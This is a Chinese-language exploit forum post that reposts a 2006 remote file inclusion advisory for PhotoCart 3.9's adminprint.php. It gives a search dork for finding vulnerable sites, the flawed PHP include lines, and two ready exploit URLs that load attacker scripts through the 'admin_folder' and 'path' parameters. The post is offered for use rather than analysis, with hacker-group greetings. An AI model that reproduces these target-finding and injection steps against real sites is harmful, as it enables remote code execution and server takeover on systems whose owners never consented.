Photo Cart 3.9 (adminprint.php) Remote File Include Vulnerability

pub!1c

魔

团队执行官

Rank: 8 Rank: 8

E.S.T核心成员

帖子: 3926
精华: 128
积分: 209876
阅读权限: 200
性别: 男
在线时间: 1119 小时
注册时间: 2007-10-23
最后登录: 2009-1-4

资料收集奖运营支持奖

发短消息
加为好友
当前离线

楼主大中小发表于 2006-11-22 12:01 只看该作者

Photo Cart 3.9 (adminprint.php) Remote File Include Vulnerability

复制内容到剪贴板

代码:

<pre>#####################################################################################################
#
# PhotoCart 3.9 (adminprint.php) Remote File Include Vulnerability
# Script site: [url]http://www.picturespro.com/store/programs/129-photo_cart.html[/url]
# Dork       : inurl :/PhotoCart/
#
#####################################################################################################
##
##
## Bug Found By : irvian
##
##
####################################################################################################
###
### GreetZ: jipank,kacung,trangkil,ibnusina,cah|gemblunkz,zoid
### Special greetz: #patihack #hitamputih #nyubicrew
###
#####################################################################################################

bug found on /PhotoCart/adminprint.php

include "setup.php";
$path = "$path";
$path = "$path";
include "$admin_folder/_admin_functions.php";
include "$path/_db.php";
    adminsessionCheck();


Expl: [url]http://www.site.com/PhotoCart/adminprint.php?admin_folder=[/url][evil_scripts]
      [url]http://www.site.com/PhotoCart/adminprint.php?path=[/url][evil_scripts]

</pre>

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » Photo Cart 3.9 (adminprint.php) Remote File Include Vulnerability